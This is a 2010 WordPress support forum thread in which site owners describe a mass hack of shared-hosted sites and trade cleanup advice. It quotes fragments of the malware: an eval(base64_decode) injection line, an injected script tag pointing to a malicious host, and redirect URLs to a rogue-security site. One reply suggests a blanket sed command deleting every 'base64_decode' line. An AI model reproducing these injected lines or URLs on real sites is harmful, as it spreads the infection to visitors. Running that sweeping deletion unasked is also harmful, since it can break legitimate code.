WordPress Site Hacked (28 posts)

  1. Hema Latha
    Both wp-adin/dashboard and my site is getting redirected to:

    [Mod note - links removed]

    Today, 04/14/2010 i logged into dashboard and it was crashed.
    I tried to refresh many a times and it still was crashed,
    and i saw this address running fast in the Task Bar:

    [Mod note - links removed]

    After sometime the dashboard started redirecting to bing.com mentioned above.

    Changes i did today:

    1. Uninstalled wp-united.
    2. Uninstalled Phpbb.
    3. Installed Beeline wp plugin.
    4. INSTALLED wp plugin Tal.Ki (Tal.ki Embeddable Forums)

    I came to know my site has been HACKED and googled few solutions.

    1. Changed Wp Admin Password.
    2. Changed FTP Password.
    3. Saw this code in Page Source:

    <script type='text/javascript'>
    /* <![CDATA[ */
    var thickboxL10n = {
    	next: "Next >",
    	prev: "< Prev",
    	image: "Image",
    	of: "of",
    	close: "Close"
    var commonL10n = {
    	warnDelete: "You are about to permanently delete the selected items.\n  \'Cancel\' to stop, \'OK\' to delete."
    var wpAjax = {
    	noPerm: "You do not have permission to do that.",
    	broken: "An unidentified error has occurred."
    var adminCommentsL10n = {
    	hotkeys_highlight_first: "",
    	hotkeys_highlight_last: ""
    var plugininstallL10n = {
    	plugin_information: "Plugin Information:"
    /* ]]> */
    <script type='text/javascript' src='http://indiangirlsclub.com/wp-admin/load-scripts.php?c=1&load=thickbox,hoverIntent,common,jquery-color,jquery-ui-core,jquery-ui-sortable,wp-ajax-response,wp-lists,jquery-ui-resizable,admin-comments,postbox,dashboard,plugin-install,media-upload&ver=b92e060c1632e7b2fe6ec9809056c0d0'></script>
    <script type="text/javascript">if(typeof wpOnload=='function')wpOnload();</script>
    <script src="[Mod note - links removed]/js.php"></script>

    5. Removed this code from Index.php and Load-Scripts.php :

    <?php /**/ eval(base64_decode[Mod note - base64 code removed]"));?>

    6. Uninstalled Tal.Ki Plugin.

    Still my site is not clean.

    It's getting redirected to :

    [Mod note - links removed]

    Site Url: http://indiangirlsclub.com
    Please HELP me. I'm not a tech savvy. What else should i do ???

  2. jirikai
    I am also having an issue with this. totally lost as to how I might go about fixing it. attemtping to scan databse.

  3. jonradio
    Hopefully, this will help:

    I also see that someone else is reporting this same problem:

  4. jonradio
    This appears to be a fix for GoDaddy customers:

  5. jirikai
    I saw some Base64 coding at the top of my index.php file in my root folder.

    Erased that and another .php file called "Florence_sdjfskd.php" or something similar. Can't remember exactly. this file also contained a ton of coding.
    My site is now back to working normally.

    No idea if this problem will arise again tonight or not as all I have done it treat the infection, not the cause. Think it's time for a wordpress core update as this appears to be a security flaw.

    while i am indeed with godaddy, other people around the net are complaining from other hosts also and i very much doubt we've all been hit by the same keylogger or malware.

  6. jirikai
    thanks by the way Adiant. Wouldn't have thought to check the top of my index.php without your advice.

  7. jonradio
    Posted 6 years ago #

    Think it's time for a wordpress core update as this appears to be a security flaw.

    Not from what I've read. Other software is being hit, too.

    Ask yourself how index.php is being modified. To me, that sounds like hackers have gained access to your web host, which is not something that WordPress can stop.

  8. jirikai
    it isn't only godaddy hosted sites.

    They go on to ramble about random reasons and getting nowhere fast but the first post says all I need to see.

    hosted on freedom-2-surf (f2s)

    I remember reading about a couple of other hosts also as i crawled the net for a possible solution. Godaddy isn't the only hosting company being targeted. This is what leads me to believe it is a WordPress issue and not hosting issue.

    The number of people being hit at once negates the chances of it being malware or keyloggers of some sort. the multiple different hosting companies negates the chances of it being a hosting issue. That leads only 1 remaining common element. the CMS WordPress.

    Of course there is always a chance that it is godaddy that is targeted and the others i saw from other hosters have been hit my malware but for it all to happen at roughly the same time leads me to believe that isn't the case. Could be wrong but doubt it.

  9. jonradio
    There are many other explanations. For example, FTP ID/password databases built by hackers over the last year. Malware on machines of anyone with the FTP ID and password for a hosting account sends them to a central hacker database. Could have happened during a single infection 8 months ago.

    The "all hit at once" syndrome is also a sign it could be hackers. They do automated mass attacks. For example, in my FTP scenario, they would go to their database of thousands of FTP ID/password/host name combinations, and attack them all at once, and make the changes you've seen.

    This is not Sci-Fi. This happened around the Labour Day weekend last summer.

    Again, if this were peculiar to WordPress security, then only WordPress would have been compromised. Instead, many other pieces of software are being hit.

  10. jirikai
    I'm fully aware such things are not sci-fi lol. There is a distinct chance you are correct.

    However i am not finding any results of this issue for any other CMS. I've tried searching Joomla and Drupal in the hopes they might have found a solution that i could use to no joy.

    If you can provide links of where you found the other pieces of software being hit, it'd be appreciated. Any and all information regarding this issue is welcomed as even the slightest hint from a different CMS could lead to a realisation of a fix for our own.

  11. jonradio
    On another forum, Hema says:
    "It's just not only the WordPress ... I also have topsites directory, 4images, Another WordPress with Buddypress installed in the root."
    ref. - http://forums.digitalpoint.com/showthread.php?t=1770144 (scroll down a way)

  12. Hema Latha
    The "eval base 64" code is just not only in Index.php and Load-Scripts.php
    But through out my FTP php files. And i have spent a whole night deleting the codes from wp-admin, wp-content and wp-includes.

    But it's still present in plugins, themes, 4images, topsites directory and more. I don't think it's possible to delete each and every php file manually.

    I have no idea how to use clean-ninoplas.sh script.
    I do understand i can change the needle. But bash, ssh .. ?

    I have also contacted Godaddy support and waiting for their reply.

  13. wpsecuritylock
    I just got done fixing someone's site who was on Godaddy with this same problem.

    First thing you should do is...

    Change your hosting account, ftp, wordpress username, and database passwords.

    If you're using Godaddy on a Linux Hosting Account...

    Login into your hosting account, go to File Manager, click on the "History" tab and see if you have a snapshot of your website before it got hacked.

    Here's how to restore it if you have a snapshot prior to the attack...

    1. Go to your Godaddy hosting account "File Manager."

    1. Click on "Current" tab and delete all files on your server. This is necessary to get rid of any "extra" files that may have been uploaded.

    ** Note **
    Do not delete or restore the _db_backups or php_uploads. These are part of Godaddy's structure and shouldn't be touched.

    2. Click on "History" tab and checkmark 3-4 files/directories at a time (so you don't overload the server). Then click on the "Restore" icon. Repeat this process until all files are restores.

    3. Edit your wp-config.php file with your new database password. And make sure you add/change your Authentication Unique Keys.

    Here's a article on how to use Restore...

    If you need further assistance, please let me know.

    Hope that helps.

  14. tdjcbe
    Anything else think a mod should break the offending links? :)

  15. Rev. Voodoo
    base64 stuff that you find in php files often comes in through a backdoor php file on your server..... here's what I went througha while back when I got hacked (on godaddy)


  16. mrmist
    Forum Janitor
    The redirection links etc. have been removed from the OP.

  17. tdjcbe
    @mrmist too bad though that you removed the domains so now we can't point folks here to let them know what to look for.

    Someone care to return the domains in question but break the links please? That way others can read this thread and know what to look for?


  18. mrmist
    Forum Janitor
    I don't really see the benefit in having the spam links added back, be they broken or otherwise. Most likely it's different for everyone, and in any event I'm not convinced it's of value.

    Sheesh, you really can't please everyone.

  19. rockinmama
    For the record: My fix and an observation...

    I noticed the other day that my WP admin dashboard was screwy and posting was nearly impossible. My friend suggested logging in to GoDaddy and installing the latest WP patch. That seemed to take care of it. Except the base64 code was still around and the strange script url in question kdjkfjskd...com/js.php (at the end of html code on all pages on my site) kept showing up.
    Obviously, not fixed. So check the last few lines of your page source code if you aren't sure if its gone!

    So I started the process of backing up and restoring. In that process I noticed an odd php file in the root directory which had nothing but base64 code. Decoding it showed that exact offending url and lots of commands that I have no clue about. I can only guess it to be the source of the infection. Don't know how it got there (would like to know- guess a call to GoDaddy is in order to see if they can check ftp logs), but can tell from the restore history that it showed up on 14 April. I copy/pasted everything that I'd written this week to a word doc and restored to pre-infection. And Promptly changed passwords and virus scanned all my computers.

    Curious about that file, so I checked my friend's Site, same file, but a different name: Mine was called "public_ride.php", hers called "surprised_nealson.php".

    Considering the alternative of having to wipe the site completely and re-upload, I'm relieved that this seems to have solved it. Now we need to figure out how this happened.

    For what its worth!

  20. Hema Latha
    @ rockinmama ..

    In the root directory, they had placed a file: "lira_seville.php",
    which contained only those Eval Base64 codes.

    Suddenly another folder is present: .hcc.thumbs
    Not sure what it is, I deleted that too.

    And even after removing all those codes MANUALLY,
    my blog showed those "...kdjkfjskdfjlskdjf...com"

    I have completely deleted everything in the FTP except wp-content.
    Replaced all wordpress files freshly downloaded.
    Things seem to work smoothly.

    But still afraid about the BACKDOORS as i'm not familiar with database.
    I have installed few plugins for security, database and firewall.

    Lost 4images, Topsites Directory, Forum, Another wp blog installed in the same root directory with buddypress.

    Googling revealed that most of the blogs hacked were in Godaddy Shared Hosting Server.


    Measures are in place to protect the overall security of the shared hosting server on which your website resides. The compromise of your account is outside of the scope of security that we provide for you. Virus scans are performed on the content that is hosted, but they may not pick up everything, largely due to the fact that hackers tend to upload custom scripts which are not picked up by traditional malware scanners. However, if a virus is detected, you will be notified. The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you.

    Let me know how was the blogs hacked !
    (so that we can avoid such mistakes in future).

  21. jonradio
    I believe that this is the official WordPress explanation of what happened to you, Hema:

    And I concur: it really is up to web hosting companies to prevent, by default, any visibility of your files and databases to other users of the same web server. Yes, I know they call it a "shared hosting environment", but I have every right to expect web hosting companies to have the smarts to protect me from everyone else on the same server.

  22. MsBsome
    I had the same thing happen to me on a Linux GoDaddy server. It hit every php file. I had to uninstall and reinstall everything including WP. I must have made 50 phone calls to GoDaddy. They were helpful- probably spoke to wpsecuritylock above who happens to be my hero at the moment.

    This thing is nasty!

  23. lijumathewliju
    The same thing was happened on my php site but it's not using word press. The same script was ejecting if the user remove the valuse starting on "base64_decode" on index.php. All the files are injected this values. I'm using Godaddy Hosting and I didn't get a satisfactory response from them yet.

    This patch will cure my problem.

    SSH to server and execute this command. Switch to "html folder" and then execute.

    $find . -type f -name "*.php" -exec sed -i '/base64_decode/d' {} \;


  24. Dmgeo
    It's a nasty malware but it's not that hard to get rid of. If you have GoDaddy you can use their file manager to restore your files. Change all your passwords to secure ones. More info on the fix here.

  25. redkathy
    I have shared hosting on godaddy. Random php files in six sites were hit. I have cleaned and restored all but word press site. I saved a restore from an earlier date and then did the restore locally using Deamweaver cs3. Every site is clean BUT WordPress and I can't find any infected files. I still see that script at the end when I view the source page. Any advice for me?

  26. Hema Latha
    WORDPRESS BLOG HACKED AGAIN ......... !!!!!!!!!

    My blog is hacked again.
    I have cleared everything and changed the passwords, installed security plugins. But now my site is hacked again.

    It's again has the same script in the Page Source:

    <script src="http:// kdjkfjskdfjlskdjf . com/kp.php"></script>

    And my antivirus program has blocked my site and giving an Alert.
    Site is getting redirected to the below link.

    http:// www1 . protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCcU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooV6UYl6XY5eSlWVsYGiYk4mrl5p2nKyoqHOQXM3UlZmOopmh1pnVk5zbj5HH0p5mWKrYnpRraWZwaGhlaHCHodeYbmFfa2RvmF2TYGeMkMahrH9dqZ%2FJnptyag%3D%3D

    All the php files have this code on the first line:

    I feel to Quit blogging.

  27. Hema Latha
    @ Dmgeo ...

    As you suggested i Restored all the files using Godaddy File Manager.

    Site is working and unable to find the kdjkfjskdfjlskdjf script in the page source and the eval base code in the php files.

    But when i tried to Login to Wp-admin, I got this message from AVG:

    Threat was blocked!

    File name: http: / / www1 . protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCdU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5oWKeih9eipqCecV6aoaXGaorcmpWkcVih1GqTYmKUXpmYkWNrZ2SXlJVfpJmfcaCorKmbXJPPn5SWlaCfzZ%2FOo5PSosWSxqCkYa3Vjs%2BomZ2nYqicqHjTksjPo5WQqJGs02rKpKTWUpaliGN9V2irytGdm5Wnm6GmpKzEmdnIX5OcoVdqqqTSXZHKmszSiGN9WKrYnpRraWZwaHBrbm%2BHodeYbmFfa2RvmGWZZmaMkMahrH9dqZ%2FJnptyag%3D%3D

    Threat name: Exploit Rogue Security Threat Analysis 9type 1007)

    I'm unable to access the wp admin/login panel.

  28. Hema Latha
    1. Restored files using Godaddy file manager.

    After restoration, site worked but the Login/Admin page was redirected to the virus site.

    2. Replaced Wp-admin & Wp-includes.

    Issue resolved.


